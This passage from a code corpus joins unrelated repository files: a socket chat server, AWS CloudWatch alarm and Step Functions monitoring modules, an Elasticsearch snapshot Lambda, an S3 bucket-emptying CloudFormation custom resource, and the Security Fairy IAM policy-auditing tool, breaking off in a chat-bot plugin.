class_info['info']["{}".format(name)]['TOT'] = size_testf + size_valf + size_trainf
with open(storing_data_path, 'wb') as filehandle:
data = {'ds_info': ds_info, 'class_info': class_info}
pickle.dump(data, filehandle)
return class_info, ds_info
``` |
{
"source": "1stop-st/structural_calculator",
"score": 3
} |
#### File: structural_calculator/structural_calculator/node.py
```python
import numpy as np
class Node:
"""
Representing a Node object.
Nodes connect members.
"""
def __init__(self):
self.position = np.zeros(3)
self.mass = 0.
self.displacement = np.zeros(6)
self.model = None
``` |
{
"source": "1StranGe/Chat-Room-101",
"score": 3
} |
#### File: Chat-Room-101/src/Server.py
```python
import socket
from threading import Thread
import time
data = open("../assets/version.txt", "r").read()
print("Chat Room 101 | " + data)
time.sleep(1)
clients = {}
addresses = {}
host = socket.gethostname()
ip = socket.gethostbyname(host)
port = 8080
s = socket.socket()
s.bind((host, port))
print(host, ip)
print("Ask clients to enter host IP as :", ip, "and port as :", port)
def accept_client():
while True:
client_con, client_address = s.accept()
client_con.send(
"Hey! Welcome to the Chat Room. Enter Your Name To Continue.".encode("utf8")
)
addresses[client_address] = client_address
t2 = Thread(target=handle_client, args=(client_con, client_address)).start()
print(client_address, "Has Connected")
def broadcast(message, prefix=""):
for x in clients:
x.send(bytes(prefix, "utf8") + message)
def handle_client(con, adr):
name = con.recv(1024).decode("utf8")
welcome_message = (
"Thanks for using this Chat Room "
+ name
+ ". You can use #quit if you want to exit"
)
con.send(bytes(welcome_message, "utf8"))
print(name, "has joint the chat")
message = name + " has joint the chat!"
broadcast(bytes(message, "utf8"))
clients[con] = name
try:
while True:
message = con.recv(1024)
if message != bytes("#quit", "utf8"):
broadcast(message, name + ": ")
else:
con.close()
del clients[con]
broadcast(bytes(name + " has left the chat.", "utf8"))
except:
print(name + " has left the chat")
if __name__ == "__main__":
s.listen()
print("The Server Is Now Online")
t1 = Thread(target=accept_client)
t1.start()
t1.join() # Waits for one thread to stop before running the next.
``` |
{
"source": "1Strategy/cloudvelum",
"score": 2
} |
#### File: cloudwedge/services/statemachine.py
```python
from os import environ
from typing import Any, Dict, List, Optional
import boto3
import jmespath
from cloudwedge.models import AWSResource, AWSService
from cloudwedge.utils.logger import get_logger
from cloudwedge.utils.tags import TagsApi
REGION = environ.get('REGION')
LOGGER = get_logger("cloudwedge.statemachine")
# Model for Service, extending AWSResource
class StateMachineResource(AWSResource):
pass
# Class for Service
class StateMachineService(AWSService):
# Name of the service, must be unique
name = "statemachine"
# Cloudwatch alarm service specific values
cloudwatch_namespace = "AWS/States"
cloudwatch_dashboard_section_title = "States"
cloudwatch_dimension = "StateMachineArn"
# Default metric to be used when metrics are not explicit in tags
default_metrics = ["ExecutionsFailed",
"ExecutionThrottled",
"ExecutionTime"]
# Alarm defaults for the service, applied if metric default doesnt exist
default_alarm_props = {
'Statistic': "Sum"
}
# List of supported metrics and default configurations
supported_metrics = {
'ExecutionsStarted': {},
'ExecutionThrottled': {},
'ExecutionsAborted': {},
'ExecutionsSucceeded': {},
'ExecutionsFailed': {},
'ExecutionsTimedOut': {},
'ExecutionTime': {}
}
# There are dashboard additions that can be added at the metric level
override_dashboard_metric_properties = {}
@staticmethod
def build_dashboard_widgets(resources: List[StateMachineResource]) -> List[Any]:
"""
Build dashboard widgets for the resources
"""
# Get widgets with base method (like calling super)
return AWSService.build_dashboard_widgets(StateMachineService, resources)
@ staticmethod
def get_resources(session: boto3.session.Session) -> List[StateMachineResource]:
"""
Return all AWS StateMachine resources within scope, based on the tags
"""
try:
# Get things in a neat statemachine resource object
cleaned_resources: List[StateMachineResource] = []
# Get paginator for service
paginator = session.client('stepfunctions').get_paginator(
'list_state_machines').paginate()
# Collect all resources
for page_resources in paginator:
for state_machine in page_resources['stateMachines']:
state_arn = state_machine['stateMachineArn']
# For each state, get the tags
states_resource_tags = session.client('stepfunctions').list_tags_for_resource(
resourceArn=state_arn)
states_tags = states_resource_tags['tags']
# Keys for the tags are 'key' and 'value' so convert that to capitalize
converted_tags = TagsApi.convert_lowercase_tags_keys(
states_tags)
# If the active monitoring tag is on the instance, include in resource collection
# Stripping key so no whitespace mismatch
if any((tag['Key'].strip() == AWSService.TAG_ACTIVE and tag['Value'] == 'true') for tag in converted_tags):
# This resource has opted in to cloudwedge
# Get values from tags if they exist
owner_from_tag = TagsApi.get_owner_from_tags(converted_tags)
name_from_tag = TagsApi.get_name_from_tags(converted_tags)
state_name = state_machine['name']
# Setup StateMachine values
service = StateMachineService.name
resource_name = name_from_tag or state_name
resource_id = state_arn
resource_owner = owner_from_tag
tags = converted_tags
# Create StateMachine
clean_resource = StateMachineResource(
service=service,
name=resource_name,
uniqueId=resource_name,
cloudwatchDimensionId=resource_id,
owner=resource_owner,
tags=tags
)
# Add to collection
cleaned_resources.append(clean_resource)
return cleaned_resources
except Exception as err:
LOGGER.info(
f"Failed to get resources information with error: {err}")
raise err
```
#### File: src/create_stacks/alarms_factory.py
```python
import hashlib
import json
import time
from os import environ
from typing import Dict, List
from cloudwedge.models import AWSResource
from cloudwedge.services import ServiceRegistry
from cloudwedge.utils.logger import get_logger
from cloudwedge.utils.s3 import s3_save_object
from resource_alarm_factory import ResourceAlarmFactory
PRIVATE_ASSETS_BUCKET = environ.get('PRIVATE_ASSETS_BUCKET')
LOGGER = get_logger('AlarmsFactory')
class AlarmsFactory():
def __init__(self, session, owner, resources: Dict[str, List[AWSResource]]):
LOGGER.info(f'🚨🏭 AlarmsFactory: {owner}')
# Track the session provided
self.session = session
# Owner of the resource
self.owner = owner
# Collection of resources, grouped by service
self.resources = resources
# Hold the templates that are created
self.alarms = {
'stackName': f'cloudwedge-autogen-{self.owner}-alarms-stack',
's3TemplateKey': None,
'template': {
"AWSTemplateFormatVersion": "2010-09-09",
"Description": f"CloudWedge Alarm Stack for all resources that have owner {self.owner}. This stack is created dynamically by CloudWedge.",
"Resources": {}
}
}
def get_stack_details(self):
"""Return stack details"""
return {
'stackName': self.alarms['stackName'],
's3TemplateKey': self.alarms['s3TemplateKey'],
'stackType': 'alarms',
'stackOwner': self.owner
}
def build(self):
"""Build alarms template for all the resources"""
# Reset the template
self.alarms['template']['Resources'] = {}
self.alarms['s3TemplateKey'] = None
# For each resource in the service group
for service_name, service_resources in self.resources.items():
# Get the service class from the registry
service = ServiceRegistry.get_service(service_name)
# Build json template for the resource
for resource in service_resources:
resource_alarm_factory = ResourceAlarmFactory(resource=resource, service=service)
# Build all the alarms for the resource
resource_alarms_template = resource_alarm_factory.build()
# Add alarms for this resource to the templates Resources section
self.alarms['template']['Resources'].update(
resource_alarms_template)
# Save the template to s3
self._save_stack(self.alarms)
# # LOCAL: write template
# self._write_template(self.alarms['template'])
def _save_stack(self, stack):
"""Save the stack to s3 and return the key"""
# Convert template to string
s3_content = json.dumps(stack['template'])
# Make s3 key for this stack
# s3_key = f'templates/{stack["stackName"]}/template.json'
s3_key = f'templates/{stack["stackName"]}/{int(time.time())}/template.json'
# Save the template
saved_key = s3_save_object(session=self.session, bucket=PRIVATE_ASSETS_BUCKET, key=s3_key,
content=s3_content)
self.alarms['s3TemplateKey'] = saved_key
# @staticmethod
# def _write_template(cf_template):
# """Local Only: Test function for running locally to write formation to file for review"""
# TEMPLATE_NAME = f"/tmp/EXAMPLE_OUTPUT.yaml"
# with open(TEMPLATE_NAME, 'w') as f:
# f.write(json.dumps(cf_template))
``` |
{
"source": "1Strategy/custom-elasticsearch-snapshots",
"score": 3
} |
#### File: functions/snapshot_function/es_snapshot.py
```python
from elasticsearch.exceptions import ConnectionError, ConnectionTimeout
from elasticsearch import Elasticsearch, RequestsHttpConnection
from requests_aws4auth import AWS4Auth
from datetime import datetime as dt
import logging
import boto3
import os
def handler(event: dict, _) -> None:
"""AWS Lambda function handler - Elasticsearch Domain Snapshot function
:type: dict
:param: event: aws cloudwatch schedule event
:type: dict
:param: _: (Unused) aws lambda function environment context
:rtype: None
"""
logger: logging.Logger = log(__name__.upper())
logger.info(f'EVENT: {event}')
dt_now = dt.now()
snapshot_file_name: str = f'{dt_now.year}-{dt_now.month}-{dt_now.day}-{dt_now.hour}-{dt_now.minute}-{dt_now.second}'
es: 'Elasticsearch' = get_es_connection()
logger.info(f'ES INSTANCE CONNECTION ACTIVE: {es.ping()}')
try:
response = es.snapshot.create(
repository=os.getenv('REPO_NAME'),
snapshot=snapshot_file_name
)
logger.info(f'RESPONSE: {response}')
except (ConnectionError, ConnectionTimeout) as e:
logger.error(e)
def get_signature() -> 'AWS4Auth':
"""Construct an AWS4Auth object for use with STS temporary credentials. The `x-amz-security-token` header is added with the session token.
:rtype: 'AWS4Auth'
"""
logger: logging.Logger = log(__name__.upper())
logger.info('Getting credentials')
credentials = boto3.Session().get_credentials()
return AWS4Auth(
credentials.access_key,
credentials.secret_key,
os.getenv('AWS_REGION'),
'es',
session_token=credentials.token
)
def get_es_connection() -> 'Elasticsearch':
"""Elasticsearch low-level client. Provides a straightforward mapping from Python to ES REST endpoints
:rtype: 'Elasticsearch'
"""
logger: logging.Logger = log(__name__.upper())
logger.info('Getting Elasticsearch Connection')
return Elasticsearch(
hosts=['https://' + os.getenv('ES_HOST')],
http_auth=get_signature(),
use_ssl=True,
verify_certs=True,
connection_class=RequestsHttpConnection
)
def log(name='aws_entity', logging_level=logging.INFO) -> logging.Logger:
"""Instantiate a logger
"""
logger: logging.Logger = logging.getLogger(name)
if len(logger.handlers) < 1:
log_handler: logging.StreamHandler = logging.StreamHandler()
formatter: logging.Formatter = logging.Formatter('%(levelname)-8s %(asctime)s %(name)-12s %(message)s')
log_handler.setFormatter(formatter)
logger.propagate = False
logger.addHandler(log_handler)
logger.setLevel(logging_level)
return logger
``` |
{
"source": "1Strategy/custom-resource-starter-template",
"score": 3
} |
#### File: functions/empty_bucket/empty_bucket.py
```python
import boto3
import logging
from crhelper import CfnResource
helper = CfnResource(json_logging=False, log_level='DEBUG', boto_level='CRITICAL')
def handler(event: dict, context: dict) -> None:
"""AWS Lambda function handler
:type: dict
:param: event: aws cloudformation custom resource event
:type: dict
:param: context: aws lambda function environment context
:rtype: dict
"""
logger: logging.Logger = log('CUSTOM RESOURCE HANDLER')
logger.info(f'EVENT: {event}')
helper(event, context)
@helper.create
def create(event: dict, _) -> None:
"""Custom Resource Helper for CloudFormation Create Event.
Decorator abstracts away the HTTP request/response cycle handled during Custom Resource events
Example Purpose: Populates empty bucket with 1000+ objects to specifically illustrate the CFn Delete event
:type: dict
:param: event: aws cloudformation custom resource event
:rtype: None
"""
logger: logging.Logger = log('CUSTOM RESOURCE HANDLER: CREATE')
# NOTE: Code below is for example purposes only, and would not be desirable in practical usage of the custom resource
client = boto3.client('s3')
for i in range(1001):
client.put_object(
Bucket=event['ResourceProperties']['BucketName'],
Body=b'Foo',
Key='file_' + '{:04d}'.format(i)
)
logger.info('Successfully put objects in bucket')
@helper.update
def update(event: dict, _) -> None:
"""Custom Resource Helper for CloudFormation Update Event.
Decorator abstracts away the HTTP request/response cycle handled during Custom Resource events
Example Purpose: Populates empty bucket with 1000+ objects (if objects not present) to specifically illustrate the CFn Delete event
:type: dict
:param: event: aws cloudformation custom resource event
:rtype: None
"""
logger: logging.Logger = log('CUSTOM RESOURCE HANDLER: UPDATE')
# NOTE: Code below is for example purposes only, and would not be desirable in practical usage of the custom resource
client = boto3.client('s3')
bucket_name = event['ResourceProperties']['BucketName']
objects = client.list_objects_v2(Bucket=bucket_name)
if objects['KeyCount'] < 1000:
create(event)
else:
logger.info('Bucket has already been populated.')
@helper.delete
def delete(event: dict, _) -> None:
"""Custom Resource Helper for CloudFormation Delete Event.
Decorator abstracts away the HTTP request/response cycle handled during Custom Resource events
Example Purpose: Removes all objects from bucket, allowing the bucket to be removed during a CFn Stack Deletion
Note: If this process is not facilitated, the Stack Deletion fails because the S3 bucket has objects within.
:type: dict
:param: event: aws cloudformation custom resource event
:rtype: None
"""
logger: logging.Logger = log('CUSTOM RESOURCE HANDLER: DELETE')
s3 = boto3.resource('s3')
bucket_name = event['ResourceProperties']['BucketName']
bucket = s3.Bucket(bucket_name)
objects = bucket.objects.all()
objects.delete()
logger.info('Successfully deleted all objects in bucket')
def log(name: str = 'aws_entity', logging_level: str = logging.INFO) -> logging.Logger:
"""Instantiate a logger
"""
logger: logging.Logger = logging.getLogger(name)
log_handler: logging.StreamHandler = logging.StreamHandler()
formatter: logging.Formatter = logging.Formatter('%(levelname)-8s %(asctime)s %(name)-12s %(message)s')
log_handler.setFormatter(formatter)
logger.addHandler(log_handler)
logger.setLevel(logging_level)
return logger
``` |
{
"source": "1Strategy/security-fairy",
"score": 2
} |
#### File: 1Strategy/security-fairy/api_endpoint.py
```python
import json
import re
import os
import string
import boto3
from botocore.exceptions import ProfileNotFound
from aws_entity import AWSEntity
try:
SESSION = boto3.session.Session(profile_name='training', region_name='us-east-1')
except ProfileNotFound as pnf:
SESSION = boto3.session.Session()
def lambda_handler(event, context):
"""
Executed by the Lambda service.
Returns the validated inputs and invokes
the State Machine that orchestrates
Security Fairy.
"""
api_return_payload = {
'statusCode': 500,
'headers':{
'Content-Type':'application/json'
},
'body':'Security Fairy Internal Server Error.'
}
domain = get_domain(event)
method = event['httpMethod']
if method == 'GET':
return api_website(event, domain)
if method == 'POST':
return post_response(event, domain)
return api_return_payload
def post_response(event, domain):
api_return_payload = {
'statusCode': 500,
'headers':{
'Content-Type':'application/json'
},
'body':'Security Fairy Internal Server Error.'
}
print(event)
try:
inputs = validate_inputs(event)
invoke_state_machine(inputs)
api_return_payload['statusCode'] = 200
api_return_payload['body'] = 'The auditing process can take up to 20 minutes. An email will be sent upon completion.'
except Exception as error:
print(error)
api_return_payload['statusCode'] = 200
api_return_payload['body'] = "Unsuccessful: {error}".format(error=error)
print api_return_payload
return api_return_payload
def get_domain(event):
# Supports test invocations from API Gateway
if event['headers'] is None:
return "https://testinvocation/start"
# Extracts the domain from event object based on for both api gateway URLs
# or custom domains
if 'amazonaws.com' in event['headers']['Host']:
return "https://{domain}/{stage}{path}".format(domain=event['headers']['Host'],
stage=event['requestContext']['stage'],
path=event['path'])
else:
return "https://{domain}{path}".format(domain=event['headers']['Host'],
path=event['path'])
def invoke_state_machine(inputs):
"""Invoke state machine"""
print json.dumps(inputs)
sfn_client = SESSION.client('stepfunctions')
response = sfn_client.start_execution(stateMachineArn=os.environ['state_machine'],
input=json.dumps(inputs)
)
print(response)
def validate_inputs(event):
"""Validate inputs"""
input_payload = json.loads(event['body'])
num_days = validate_date_window(input_payload.get('num_days', 7))
entity_arn = validate_entity_arn(input_payload.get('entity_arn'))
return {
'num_days' : num_days*-1,
'entity_arn': entity_arn
}
def validate_date_window(days):
"""Validate the date range for the Security Fairy query"""
window = abs(days)
if window > 30 or window < 1:
print window
raise ValueError('Valid number of days is between 1 and 30 inclusive.')
return window
def validate_entity_arn(entity_arn):
"""Validate entity ARN"""
# account_number = SESSION.client('sts').get_caller_identity()["Account"]
# Roles are valid: arn:aws:iam::842337631775:role/1S-Admins
# arn:aws:sts::281782457076:assumed-role/1S-Admins/alex
# Users are invalid: arn:aws:iam::842337631775:user/aaron
try:
arn = AWSEntity(entity_arn)
except Exception:
raise ValueError('Malformed ARN. Please enter a role ARN.')
print(arn.entity_type)
if 'user' in arn.entity_type:
raise ValueError('Users not supported. Please enter a role ARN.')
if 'group' in arn.entity_type:
raise ValueError('Groups not supported. Please enter a role ARN.')
if not arn.is_assumed_role() and not arn.is_role():
raise ValueError('Invalid Resource ARN.')
# pattern = re.compile("arn:aws:(sts|iam)::(\d{12})?:(role|assumed-role)\/(.*)")
# if not pattern.match(entity_arn):
# raise ValueError('Invalid Resource ARN.')
assumed_role_pattern = re.compile("arn:aws:sts::(\d{12})?:assumed-role\/(.*)\/(.*)")
if not assumed_role_pattern.match(entity_arn):
refactored_arn = "arn:aws:sts::" + arn.get_account_number() + ":assumed-role/" + arn.get_entity_name()
entity_arn = refactored_arn
SESSION.client('iam').get_role(RoleName=arn.get_entity_name())
return entity_arn
def invoke_state_machine(inputs):
print(json.dumps(inputs))
response = SESSION.client('stepfunctions').start_execution( stateMachineArn=os.environ['state_machine'],
input=json.dumps(inputs))
print(response)
def api_website(event, domain):
body = """
<html>
<body bgcolor=\"#E6E6FA\">
<head>
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="<KEY>" crossorigin="anonymous">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
<style>
.form {
padding-left: 1cm;
}
.div{
padding-left: 1cm;
}
</style>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
<script>
$(document).ready(function(){
$("button").click(function(){
var entity_arn = document.getElementById("entity_arn").value;
var dict = {};
dict["entity_arn"] = entity_arn;
if (document.getElementById("num_days").value != "") {
dict["num_days"] = Number(document.getElementById("num_days").value);
}
else{
dict["num_days"] = 30;
};
$.ajax({
type: 'POST',
headers: {
'Content-Type':'application/json',
'Accept':'text/html'
},
url:'$domain',
crossDomain: true,
data: JSON.stringify(dict),
dataType: 'text',
success: function(responseData) {
alert(responseData);
//document.getElementById("id").innerHTML = responseData;
document.getElementById("entity_arn").value="";
document.getElementById("num_days").value="";
},
error: function (responseData) {
//alert(responseData);
alert('POST failed.'+ JSON.stringify(responseData));
}
});
});
});
</script>
</head>
<title>Security Fairy IAM Policy Remediation Tool</title>
<h1 class="div">Security Fairy IAM Remediation Tool</h1>
<body>
<form class="form" action="" method="post">
<textarea rows="1" cols="50" name="text" id="entity_arn" placeholder="arn:aws:iam::0123456789:role/roleName"></textarea>
</form>
<form class="form" action="" method="post">
<textarea rows="1" cols="50" name="text" id="num_days" placeholder="Scan the logs for between 1-30 days (Enter Number)"></textarea>
</form>
<div class="div"><button class="btn btn-primary">Audit Entity</button></div>
<div class="div" id="id"></div>
</body>
</html>
"""
return {
"statusCode": 200,
"headers": {
"Content-Type": 'text/html',
"Access-Control-Allow-Origin": "*"
},
"body": string.Template(body).safe_substitute({"domain": domain})
}
if __name__ == '__main__':
print(validate_entity_arn('arn:aws:sts::842337631775:assumed-role/1S-Admins/potato'))
```
#### File: 1Strategy/security-fairy/build_cloudtrail_table.py
```python
import os
import sys
import json
from datetime import datetime, timedelta
import logging
import boto3
from botocore.exceptions import ProfileNotFound
from time import sleep
# These parameters should remain static
TIME = datetime.utcnow()
AMZ_DATE = TIME.strftime('%Y%m%dT%H%M%SZ')
DATE_STAMP = TIME.strftime('%Y%m%d')
PROFILE = 'sandbox'
LOG_LEVEL = logging.DEBUG
SUCCESS = "SUCCESS"
FAILED = "FAILED"
try:
SESSION = boto3.session.Session(
profile_name=PROFILE,
region_name='us-east-1'
)
except ProfileNotFound as pnf:
SESSION = boto3.session.Session()
try:
from urllib import HTTPError, build_opener, HTTPHandler, Request
except ImportError:
from urllib.error import HTTPError
from urllib.request import build_opener, HTTPHandler, Request
def send(event, context, response_status, reason=None, response_data=None, physical_resource_id=None):
response_data = response_data or {}
response_body = json.dumps(
{
'Status': response_status,
'Reason': reason or "See the details in CloudWatch Log Stream: " + context.log_stream_name,
'PhysicalResourceId': physical_resource_id or context.log_stream_name,
'StackId': event['StackId'],
'RequestId': event['RequestId'],
'LogicalResourceId': event['LogicalResourceId'],
'Data': {'ConfigJson': response_data}
}
)
logging.debug("Sending Response to CloudFormation")
logging.debug(response_body)
opener = build_opener(HTTPHandler)
request = Request(event['ResponseURL'], data=response_body.encode('utf-8'))
request.add_header('Content-Type', '')
request.add_header('Content-Length', len(response_body.encode('utf-8')))
request.get_method = lambda: 'PUT'
response = opener.open(request)
try:
response = opener.open(request)
print("Status code: {}".format(response.getcode()))
print("Status message: {}".format(response.msg))
return True
except HTTPError as exc:
print("Failed executing HTTP request: {}".format(exc.code))
return False
def save_query(cloudtrail_logs_bucket):
"""Store the CloudTrail table creation query
"""
athena = SESSION.client('athena')
acct_number = SESSION.client('sts').get_caller_identity().get('Account')
query_list = athena.list_named_queries()
name_list = []
for query in query_list.get("NamedQueryIds"):
check = athena.get_named_query(
NamedQueryId=query
)
name_list.append(check['NamedQuery'].get('Name'))
if "cloudtrail_logs" in name_list:
print("This query is already saved.")
else:
response = athena.create_named_query(
Name="cloudtrail_logs",
Description="Table of CloudTrail Logs created by Security Fairy.",
Database="aws_logs",
QueryString="""
create external table if not exists aws_logs.cloudtrail (
eventVersion string,
userIdentity
struct<
type: string,
principalId: string,
arn: string,
accountId: string,
userName: string,
invokedBy: string,
accesskeyid:string,
sessioncontext:
struct<
attributes:
struct<
mfaauthenticated:string,
creationdate:string
>,
sessionIssuer:
struct<
type:string,
principalId:string,
arn:string,
accountId:string,
userName:string
>
>
>,
eventTime string,
eventSource string,
eventName string,
awsRegion string,
sourceIPAddress string,
userAgent string,
errorCode string,
errorMessage string,
requestID string,
eventID string,
resources
array<
struct<
ARN:string,
accountId:string,
type:string
>
>,
eventType string,
apiVersion string,
readOnly boolean,
recipientAccountId string,
sharedEventID string,
vpcEndpointId string
)
partitioned by (region STRING, year STRING, month STRING, day STRING)
row format serde 'com.amazon.emr.hive.serde.CloudTrailSerde'
stored as inputformat 'com.amazon.emr.cloudtrail.CloudTrailInputFormat'
outputformat 'org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat'
location 's3://{cloudtrail_bucket}/AWSLogs/{account_number}/CloudTrail/'
;""" \
.format(cloudtrail_bucket=cloudtrail_logs_bucket,
account_number=acct_number)
)
return response
def build_database(s3_bucket):
"""Build the logs database in Athena
"""
athena = SESSION.client('athena')
output = 's3://{s3_bucket}/tables'.format(s3_bucket=s3_bucket)
config = {
'OutputLocation': output,
'EncryptionConfiguration': {
'EncryptionOption': 'SSE_S3'
}
}
response = athena.start_query_execution(
QueryString="create database if not exists aws_logs;",
ResultConfiguration=config
)
def execute_cloudtrail_table_creation(s3_bucket):
"""Create the CloudTrail Logs table using the saved query
"""
athena = SESSION.client('athena')
query_list = athena.list_named_queries()
name_list = []
output = 's3://{s3_bucket}/tables'.format(s3_bucket=s3_bucket)
config = {
'OutputLocation': output,
'EncryptionConfiguration': {
'EncryptionOption': 'SSE_S3'
}
}
run_query = ''
for query_id in query_list.get("NamedQueryIds"):
query_obj = athena.get_named_query(
NamedQueryId=query_id
)
query_details = query_obj['NamedQuery']
if query_details.get('Name') == 'cloudtrail_logs':
run_query = query_details.get('QueryString')
response = athena.start_query_execution(
QueryString=run_query,
ResultConfiguration=config
)
return response
def build_inital_partitions(security_fairy_bucket, cloudtrail_bucket, account):
athena_client = SESSION.client('athena')
output = f"s3://{security_fairy_bucket}/security-fairy-partition-queries"
year = datetime.now().year
month = datetime.now().month
day = datetime.now().day
regions = ['us-west-2',
'us-west-1',
'us-east-2',
'us-east-1',
# 'ap-south-1',
# 'ap-northeast-2',
# 'ap-southeast-1',
# 'ap-southeast-2',
# 'ap-northeast-1',
# 'ca-central-1',
# 'cn-north-1',
# 'eu-central-1',
# 'eu-west-1',
# 'eu-west-2',
# 'eu-west-3',
# 'sa-east-1',
# 'us-gov-west-1'
]
config = {
'OutputLocation': output,
'EncryptionConfiguration': {
'EncryptionOption': 'SSE_S3'
}
}
for region in regions:
try:
for x in range(30):
new_time = datetime.now() - timedelta(x)
# sleep(.5)
response = athena_client.start_query_execution(
QueryString = f"ALTER TABLE aws_logs.cloudtrail ADD IF NOT EXISTS PARTITION (region='{region}', year={new_time.year}, month={new_time.month}, day={new_time.day}) LOCATION 's3://{cloudtrail_bucket}/AWSLogs/{account}/CloudTrail/{region}/{new_time.year}/{new_time.month}/{new_time.day}/'; ",
ResultConfiguration=config
)
#change to logger
print(response)
except Exception as e:
print(e)
def lambda_handler(event, context):
"""Lambda Handler for Build_Cloudtrail_Table
"""
logging.debug(json.dumps(event))
# Setup Logging, delete other loggers
root = logging.getLogger()
if root.handlers:
for handler in root.handlers:
root.removeHandler(handler)
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=LOG_LEVEL, datefmt='%Y-%m-%dT%H:%M:%S')
logging.getLogger('boto3').setLevel(logging.WARNING)
logging.getLogger('botocore').setLevel(logging.WARNING)
logging.debug("Environment Variables:")
logging.info("Start Execution")
try:
cloudtrail_bucket = os.environ["cloudtrail_bucket"]
security_fairy_bucket = os.environ["security_fairy_bucket"]
account = os.environ["aws_account"]
log_level = os.environ.get('LOG_LEVEL','INFO') # Logging Level
saved = save_query(cloudtrail_bucket)
logging.debug(saved)
db = build_database(cloudtrail_bucket)
logging.debug(db)
executed = execute_cloudtrail_table_creation(cloudtrail_bucket)
build_inital_partitions(security_fairy_bucket, cloudtrail_bucket, account)
logging.debug(executed)
logging.info("Successful Execution")
send(event, context, "SUCCESS")
except Exception as error:
logging.info("Failed Execution")
logging.info(error)
send(event, context, "FAILED")
return "Error"
if __name__ == '__main__':
lambda_handler({}, {})
```
#### File: 1Strategy/security-fairy/email_approval_request.py
```python
import boto3
import logging
from requests.utils import quote
from botocore.exceptions import ProfileNotFound
from setup_logger import create_logger
logger = create_logger(name="email_approval_request.py")
try:
SESSION = boto3.session.Session(profile_name='training',
region_name='us-east-1')
except ProfileNotFound as pnf:
SESSION = boto3.session.Session()
def lambda_handler(event, context):
""" Executed by the Lambda service.
Sends an approval URL to the user via SNS.
"""
execution_id = event['execution_id']
task_token = quote(event['task_token'], safe='')
api_endpoint = event['api_endpoint']
approval_url = '{api_endpoint}approve?execution-id={execution_id}&task-token={tasktoken}'\
.format(api_endpoint=api_endpoint,
execution_id=execution_id,
tasktoken=task_token
)
sns_client = SESSION.client('sns')
sns_arn = event['sns_arn']
# Build message
message = 'Approve changes from Security Fairy here: {approval_url}'\
.format(approval_url=approval_url)
logger.debug(message)
response = sns_client.publish(
TopicArn=sns_arn,
Message="{message}".format(message=message),
Subject='Security Fairy Permissions Request')
logger.debug(response)
if __name__ == '__main__':
EVENT = {
'execution_id':'f0774f6d-3986-4478-be43-23b62cfc65c0',
'task_token': "<KEY>
'api_endpoint': "https://gndl1fc1ii.execute-api.us-east-1.amazonaws.com/Prod",
'sns_arn': 'arn:aws:sns:us-east-1:281782457076:security_fairy_topic'
}
lambda_handler(EVENT, {})
```
#### File: security-fairy/tests/test_classes.py
```python
import sys
sys.path.insert(0,'..')
import logging
import pytest
import json
from aws_iam_policy import IAMPolicy
from aws_iam_policy import IAMStatement
from aws_entity import Arn
logging_level = logging.INFO
# statement = IAMStatement('Allow',["pot:atosoup","goat:cheese"],'*', logging_level = logging_level)
# statement.get_statement()
# policy = IAMPolicy(logging_level = logging_level)
# policy.add_statement(statement)
# print(policy.print_policy())
# print(policy.get_policy())
# arn = Arn('arn:aws:iam::281782457076:role/1s_tear_down_role', logging_level = logging.DEBUG)
# # arn = Arn('arn:aws:iam:us-east-1:842337631775:role/service-role/StatesExecutionRole-us-west-2')
# policy = IAMPolicy(logging_level = logging_level)
# policy.add_action('lambda:Invoke')
# policy.add_action('lambda:Potato20160303')
# policy.add_action('ec2:RunInstances')
# policy.add_action('ec2:StartInstances')
# policy.add_action('monitoring:CreateAlarm')
# print(policy.print_policy())
arn = Arn('arn:aws:sts::281782457076:assumed-role/1s_tear_down_role/lanbda-function-name', logging_level = logging.DEBUG)
print(arn.is_role())
print(arn.is_policy())
print(arn.is_assumed_role())
print(arn.get_full_arn())
arn.convert_assumed_role_to_role()
print(arn.get_full_arn())
def test_iam_policy_class():
"""Test Athena Query"""
policy = IAMPolicy(logging_level = logging_level)
policy.add_action('lambda:Invoke')
policy.add_action('ec2:RunInstances')
policy.add_action('ec2:StartInstances')
policy.add_action('monitoring:CreateAlarm')
assert policy.print_policy() == json.dumps({"Version": "2012-10-17", "Statement": [{"Action": ["ec2:RunInstances", "ec2:StartInstances"], "Resource": "*", "Effect": "Allow", "Sid": "SecurityFairyBuiltEc2Policy"}, {"Action": ["cloudwatch:CreateAlarm"], "Resource": "*", "Effect": "Allow", "Sid": "SecurityFairyBuiltCloudwatchPolicy"}, {"Action": ["lambda:Invoke"], "Resource": "*", "Effect": "Allow", "Sid": "SecurityFairyBuiltLambdaPolicy"}]})
# policy.add_action('ec2:RunInstances')
# policy.add_action('ec2:StartInstances')
# policy.add_action('monitoring:CreateAlarm')
# assert policy.print_policy() == json.dumps({"Version": "2012-10-17", "Statement": [{"Action": ["ec2:RunInstances", "ec2:StartInstances"], "Resource": "*", "Effect": "Allow", "Sid": "SecurityFairyBuiltEc2Policy"}, {"Action": ["cloudwatch:CreateAlarm"], "Resource": "*", "Effect": "Allow", "Sid": "SecurityFairyBuiltCloudwatchPolicy"}, {"Action": ["lambda:Invoke"], "Resource": "*", "Effect": "Allow", "Sid": "SecurityFairyBuiltLambdaPolicy"}]})
```
#### File: 1Strategy/security-fairy/variable_injection.py
```python
import os
import boto3
def lambda_handler(event, context):
""" Executed by Lambda service.
Define and return runtime-specific
environment variables.
"""
name = os.environ['AWS_LAMBDA_FUNCTION_NAME']
region = os.environ['AWS_REGION']
version = os.environ['AWS_LAMBDA_FUNCTION_VERSION']
lambda_client = boto3.client('lambda', region_name=region)
lambda_function = lambda_client.get_function(FunctionName=name, Qualifier=version)
raw_env_vars = lambda_function['Configuration']['Environment']['Variables']
for key, value in raw_env_vars.items():
event[key] = value
return event
``` |
{
"source": "1stvamp/hippybot",
"score": 3
} |
#### File: hippybot/plugins/wave.py
```python
from collections import Counter
from hippybot.decorators import botcmd
class Plugin(object):
"""HippyBot plugin to make the bot complete a wave if 3 people in a
row do the action "\o/".
"""
global_commands = ['\o/', 'wave']
command_aliases = {'\o/': 'wave'}
counts = Counter()
def __init__(self, config):
pass
@botcmd
def wave(self, mess, args):
"""
If enough people \o/, techbot will too.
Everyone loves a follower, well, techbot is here to fulfill that need
"""
